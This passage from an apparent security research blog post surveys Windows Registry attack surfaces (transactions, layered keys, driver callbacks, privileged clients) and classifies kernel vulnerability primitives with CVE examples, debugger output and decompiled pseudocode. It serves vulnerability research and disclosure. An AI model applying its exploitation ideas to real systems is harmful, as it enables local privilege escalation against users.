are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below: Operation KTM (API) KTM (system call) Lightweight (API) Lightweight (system call) Create transaction CreateTransaction NtCreateTransaction - NtCreateRegistryTransaction Rollback transaction RollbackTransaction NtRollbackTransaction - NtRollbackRegistryTransaction Commit transaction CommitTransaction NtCommitTransaction - NtCommitRegistryTransaction As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes: NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved); NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved); NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved); Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient. From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified. But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.Layered keys Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first. Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example: By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey), By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero). I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis. When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks. So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.Alternative registry attack targets The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.Drivers implementing registry callbacks Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose. From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls. Here are some examples of things that can go wrong in the implementation of callbacks: Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]"). As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic. As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command: 0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0 ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules: WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose. In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.Privileged registry clients: programs and drivers The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature. The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application. From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases. However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing. The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.  For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup. Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\ path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order: Create a new key named HKLM\Software\CustomAutostart\,Set the "CommandLine" value to the string provided by the client,Set the "UserName" value to the string provided by the client. The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process. One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.Vulnerability primitives In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.Pool memory corruption Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files. The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call. Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future. When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.Hive memory corruption The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region. So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects. I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data. The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort. With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process). First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:Setting too long a key name or inserting the illegal character '\' into the name,Creating a fake exit node key,Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),... and many, many others. However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.Invalid cell indexes This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.Cell index 0xFFFFFFFF (HCELL_NIL) This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes). Some examples of such vulnerabilities include:CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives. When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + 0xFFF + 4; } In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice." Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:   if (Index == HCELL_NIL) {     KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);  } This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:   if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {     KeBugCheckEx(...);   } The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂Dangling (out-of-date) cell indexes Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption. Notable examples of such bugs include:CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641. In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.Fully controlled/arbitrary cell indexes The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past: CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value. Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a 